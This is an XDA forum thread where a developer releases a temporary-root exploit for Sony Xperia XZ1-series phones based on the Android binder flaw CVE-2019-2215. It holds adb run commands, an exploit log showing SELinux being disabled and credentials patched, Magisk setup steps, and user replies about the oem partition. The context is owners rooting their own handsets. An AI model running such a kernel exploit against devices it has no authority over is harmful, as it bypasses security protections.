FORUMS
Remove All Ads from XDA

[XZ1c/XZ1/XZp] temp root exploit via CVE-2019-2215 including magisk setup [Locked BL]

946 posts
Thanks Meter: 1,987
 
By j4nn, Recognized Developer on 7th February 2020, 02:21 AM
Post Reply Email Thread
temp root exploit for sony xperia XZ1c/XZ1/XZp with oreo firmware
by j4nn
https://j4nn.github.io/

Let me present you a temp root exploit for sony xperia XZ1 Compact / XZ1 / XZ Premium phones running android oreo firmware.
The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).

SUPPORTED TARGETS
  • XZ1 Compact
    • G8441_47.1.A.8.49 (tested myself)
    • G8441_47.1.A.16.20 (tested myself)
  • XZ1
    • G8341_47.1.A.16.20
    • G8342_47.1.A.16.20
  • XZ Premium
    • G8141_47.1.A.16.20
    • G8142_47.1.A.16.20
with bindershell-v2 following targets added:
  • Xperia XZ1
    • G8343_47.1.A.12.150 (Freedom Canada)
    • G8343_47.1.A.12.205 (Freedom Canada)
    • SO-01K_47.1.F.1.105 (Docomo Japan)
    • SOV36_47.1.C.9.106 (AU Japan)
  • Xperia XZ1 Compact
    • SO-02K_47.1.F.1.105 (Docomo Japan)
  • XZ Premium
    • SO-04J_47.1.F.1.105 (Docomo Japan)

This is an alternative method to my renoroot exploit release before, to get a temp root shell for TA (drm keys) backup .

I've also implemented a script to start up magisk from the temp root shell, so this can be used nicely with still locked phones to enable magisk root without unlocking bootloader with the latest oreo fw. You still cannot modify anything in /system or /vendor partitions due to dm-verity, but you could use it for other useful stuff, like iptables based firewall for example.

Listed firmware versions may be found for example here:
https://www.xperiasite.pl/forum/221-firmware/
https://boycracked.com/?s=xperia+xz1

USAGE HOWTO
  • to get a simple temp root shell
    just download bindershell.zip, unzip, 'adb push bindershell /data/local/tmp' and get temp root:
    Code:
    G8441:/ $ cd /data/local/tmp
    G8441:/data/local/tmp $ chmod 755 ./bindershell                                                                                                                
    G8441:/data/local/tmp $ ./bindershell                                                                                                                          
    
    bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
    https://github.com/j4nn/renoshell/tree/CVE-2019-2215
    
    MAIN: starting exploit for devices with waitqueue at 0x98
    PARENT: Reading leaked data
    PARENT: leaking successful
    MAIN: thread_info should be in stack
    MAIN: parsing kernel stack to find thread_info
    PARENT: Reading leaked data
    PARENT: Reading extra leaked data
    PARENT: leaking successful
    MAIN: task_struct_ptr = ffffffecc9691b00
    MAIN: thread_info_ptr = ffffffecc4c34000
    MAIN: Clobbering addr_limit
    MAIN: should have stable kernel R/W now
    kaslr slide 0x1d35200000
    selinux set to permissive
    current task credentials patched
    
    got root, start shell...
    
    G8441:/data/local/tmp #
  • for temp root with magisk setup
    do as in previous option and download also the magisk-setup-from-exploit.zip and Magisk-v19.3-Manager-v7.1.2.zip, unzip both and use following commands in addition (skip starting the bindershell in previous section):
    Code:
    adb install MagiskManager-v7.1.2.apk
    adb push Magisk-v19.3 /data/local/tmp
    adb shell 'cd /data/local/tmp/Magisk-v19.3 ; chmod 755 * ; /system/bin/sh ./update-binary -x ; ./magiskinit -x magisk magisk'
    adb push magisk-setup.sh /data/local/tmp
    adb shell chmod 755 /data/local/tmp/magisk-setup.sh
    (also present in the included magisk-push.sh script, which you can simply execute in linux or possibly rename to a .bat file and execute it in windows too /not tested though/)
    The above would copy the needed stuff to your phone.
    Then after each boot you can use following command to startup magisk via the exploit:
    Code:
    adb shell 'cd /data/local/tmp ; ./bindershell -c ./magisk-setup.sh'


SOURCES
Source code for the exploit (bindershell) is available here:
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

Magisk startup script is obviously already in source form inside the magisk-setup-from-exploit.zip archive attached.

Magisk binaries packed in the Magisk-v19.3-Manager-v7.1.2.zip are not modified upstream released Magisk-v19.3.zip and MagiskManager-v7.1.2.apk, extracted only needed components and combined into single archive.
It might be possible to use other versions (v19.3+), but that has not been tested and is not supported in any way.

CREDITS
thanks to @arpruss for the su98 exploit variant (where binder_thread wait queue is at 0x98 offset instead of 0xa0, needed completely different approach than the original exploit) - the core of the exploit up to kernel space r/w primitives has been used

DOWNLOAD
Attached Thumbnails
Click image for larger version

Name:	bindershell-starting-magisk.png
Views:	430
Size:	125.6 KB
ID:	4944603   Click image for larger version

Name:	magisk-from-temproot-working.png
Views:	434
Size:	55.4 KB
ID:	4944605  
Attached Files
File Type: zip bindershell.zip - [Click for QR Code] (8.1 KB, 64 views)
File Type: zip magisk-setup-from-exploit.zip - [Click for QR Code] (1.4 KB, 48 views)
File Type: zip Magisk-v19.3-Manager-v7.1.2.zip - [Click for QR Code] (3.49 MB, 36 views)
File Type: zip bindershell-v2.zip - [Click for QR Code] (8.3 KB, 58 views)
The Following 17 Users Say Thank You to j4nn For This Useful Post: [ View ]
7th February 2020, 05:26 AM |#2  
Junior Member
Thanks Meter: 0
 
More
Hi @j4nn, it's done for my XZ1 DUAL. Many thanks. But when I unplug the phone from computer, then temp root will be reset, it is normal?
Ps: Do I need to worry/care about dm-verity?
Attached Thumbnails
Click image for larger version

Name:	Screenshot_20200207-112550.png
Views:	298
Size:	166.7 KB
ID:	4944745   Click image for larger version

Name:	Screenshot_20200207-112601.png
Views:	292
Size:	93.3 KB
ID:	4944747  
7th February 2020, 11:19 AM |#3  
p@to's Avatar
Senior Member
Thanks Meter: 74
 
More
I can permanently uninstall bloatware, install adaway and other applications that need root..
I think it's said. But I need to ask.
Thank you



Sent from my [device_name] using XDA-Developers Legacy app
7th February 2020, 07:38 PM |#4  
Senior Member
Flag Nuremberg
Thanks Meter: 663
 
More
Quote:
Originally Posted by [email protected]

I can permanently uninstall bloatware, install adaway and other applications that need root..
I think it's said. But I need to ask.
Thank you

Yes, you can install and use e.g. adaway, AFWall+ etc.
But - as already mentioned in the op - it's not possible to modify /system and /vendor, due to dm-verity, which is still present with a locked bl. Therefore you can't get rid of bloatware, which is placed in /system or /vendor
The Following 2 Users Say Thank You to Klaus N. For This Useful Post: [ View ] Gift Klaus N. Ad-Free
7th February 2020, 09:50 PM |#5  
OP Recognized Developer
Thanks Meter: 1,987
 
Donate to Me
More
Actually you can remove bloatware permanently, but without gaining any storage space.
It is possible to do that via oem partition - there you can make modifications, dm-verity does not check oem partition.
It is possible to define which applications would be "removed", then even factory reset would not enable them again.
This way of bloatware removal is quite tricky, as you may need to test factory reset to see if the phone boots or not.
Such debloating can be done via early_config.xml in oem partition - there you can permanently blacklist apps with entries like this:
Code:
   <string-array name="config_packagesBlacklist">
      <item>com.amazon.mShop.android.shopping</item>
   </string-array>
   <string-array name="config_packagesFullBlacklist">
      <item>com.amazon.mShop.android.shopping</item>
   </string-array>
The Following 3 Users Say Thank You to j4nn For This Useful Post: [ View ]
8th February 2020, 01:05 AM |#6  
OP Recognized Developer
Thanks Meter: 1,987
 
Donate to Me
More
temp root for new targets available with bindershell-v2 - following targets added:
  • Xperia XZ1
    • G8343_47.1.A.12.150 (Freedom Canada)
    • G8343_47.1.A.12.205 (Freedom Canada)
    • SO-01K_47.1.F.1.105 (Docomo Japan)
    • SOV36_47.1.C.9.106 (AU Japan)
  • Xperia XZ1 Compact
    • SO-02K_47.1.F.1.105 (Docomo Japan)
  • XZ Premium
    • SO-04J_47.1.F.1.105 (Docomo Japan)
(offsets extracted from kernels from fully downloaded firmwares)
The Following 2 Users Say Thank You to j4nn For This Useful Post: [ View ]
8th February 2020, 08:42 AM |#7  
bigrammy's Avatar
Senior Member
Flag huddersfield
Thanks Meter: 2,422
 
More
Quote:
Originally Posted by j4nn

temp root exploit for sony xperia XZ1c/XZ1/XZp with oreo firmware
by j4nn

Nice work j4nn
8th February 2020, 12:44 PM |#8  
p@to's Avatar
Senior Member
Thanks Meter: 74
 
More
@j4nn
Thank you very much for the possibilities you give us due to your great work.
Once TA backup has been carried out, Magisk installed and changes made using root example install adaway, some Magisk module, etc.
These changes are maintained if we update firmware to Pie?
Can we continue using root with Magisk in Pie?
Thanks in advance

Sent from my [device_name] using XDA-Developers Legacy app
8th February 2020, 12:57 PM |#9  
OP Recognized Developer
Thanks Meter: 1,987
 
Donate to Me
More
@[email protected], it's only a temp root. Once you power off / reboot, it is not rooted anymore, you would need to start the exploit again - just the last command starting magisk. Using magisk modules might work or not, it depends - magisk is used in a way here that it has not been designed in (normally it should be started from kernel's ramdisk before the original init).
You need to unlock and restore ta backup in order to get possibilities like custom kernels or full roms, pie or whatever...
The only permanent customizations may be done in oem partition. You could tune the blacklisted apps there in an oem version from pie firmware to prepare it for pie upgrade and then manually flash the rest of the pie fw skipping oem to keep the modded/debloated seetup in oem while running pie with still locked BL, obviously without root.
Or stick with the exploitable fw version (latest oreo) to be able to startup magisk after each boot, if you cannot unlock your BL.
The Following 3 Users Say Thank You to j4nn For This Useful Post: [ View ]
8th February 2020, 01:14 PM |#10  
Junior Member
Thanks Meter: 0
 
More
Quote:
Originally Posted by Klaus N.

Yes, you can install and use e.g. adaway, AFWall+ etc.
But - as already mentioned in the op - it's not possible to modify /system and /vendor, due to dm-verity, which is still present with a locked bl. Therefore you can't get rid of bloatware, which is placed in /system or /vendor

Hi @j4nn, can we modify /etc or /cache? Of course we cannot with /system /vendor, but I have no idea about another place.
8th February 2020, 02:16 PM |#11  
OP Recognized Developer
Thanks Meter: 1,987
 
Donate to Me
More
@anaconda875, I believe /etc is a symlink to /system/etc. You could redirect it somewhere else and make changes there. But it would be only temporal, because content of / is coming from kernel's initramfs, that is not possible to modify persistently with just a temp root. You can modify /cache, but I am afraid there is not that interesting stuff to change there.
In my opinion, the most interesting stuff you can modify is the content in /oem, where you can permanently block apps (debloat) or change stuff related to wifi/lte calling.
The Following User Says Thank You to j4nn For This Useful Post: [ View ]
Post Reply Subscribe to Thread
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes